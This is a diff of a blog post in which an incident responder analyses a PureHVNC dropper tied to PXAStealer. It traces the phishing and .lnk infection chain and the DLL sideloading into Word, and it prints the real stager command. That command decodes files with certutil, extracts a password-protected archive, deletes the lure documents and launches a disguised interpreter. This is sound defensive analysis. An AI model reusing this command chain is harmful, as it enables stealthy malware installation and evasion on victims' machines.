ra2302/ra2302.github.io/_posts/2025-08-06-Seven-PureHVNC-Dropper.md

 tags: [Malware Analysis]
 ---
 ## Intro
 This piece of malware was spotted in one of the incident for which I led the response.
 It was executed, undetected by Defender for Endpoint and garned a full fledged IR investigation.
 I will not mention the whole IR process as this focuses more on the analysis of the dropper which was a multi-stage heavily obfucated python script & C# binary.
+To give more context to it.
+It was a PXAStealer attack as seen on [SentinelOne](https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/).
+SentinelOne focused more on the PXAStealer(DLL) aspect, whereas this one is a later step in the infection chain leading to persistence.

 ### How we got here?
 The user received a phishing link on their personal email address and opened it on their corporate device and it started the infection.
 It originated through a  .lnk file which is consistent with previous PureHVNC infections.
 The .lnk file included a obfuscated script which initiated the download of a master zip archive.
 That was followed by the creation more zip archives with .pdf extension which originated from master zip file and were extracted.
-Python launcher and all dependencies, including malware config file, were extracted from the zip archives in the "C:\Users\Public\Windows\" directory and it executed a python script in memory.
+Python launcher, malicious dll and all dependencies, were extracted from the zip archives in the "C:\Users\Public\Windows\" directory and once the DLL was sideloaded into MS Word binary, it executed the below mentioned command and which in turn exectued python script in memory.
 I can't share the screenshots or more information as it might contain senstive information.
 From the very beginning, the attack happened mainly through memory only.
-Here's the initial stager command.
+Here's the initial stager command from the sideloaded DLL.
 ```
 cmd /c cd "" && start "Google Ads Playbook.docx" && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\\Users\\Public && del /s /q Document.pdf && del /s /q Invoice.pdf && del /s /q images.png && del /s /q "Contract Invoice.docx" && del /s /q "Evidence Report.docx" && cd C:\\Users\\Public\\Windows && start svchost.exe Lib\\images.png MR_Q_NEW_VER_BOT && exit && exit
 ```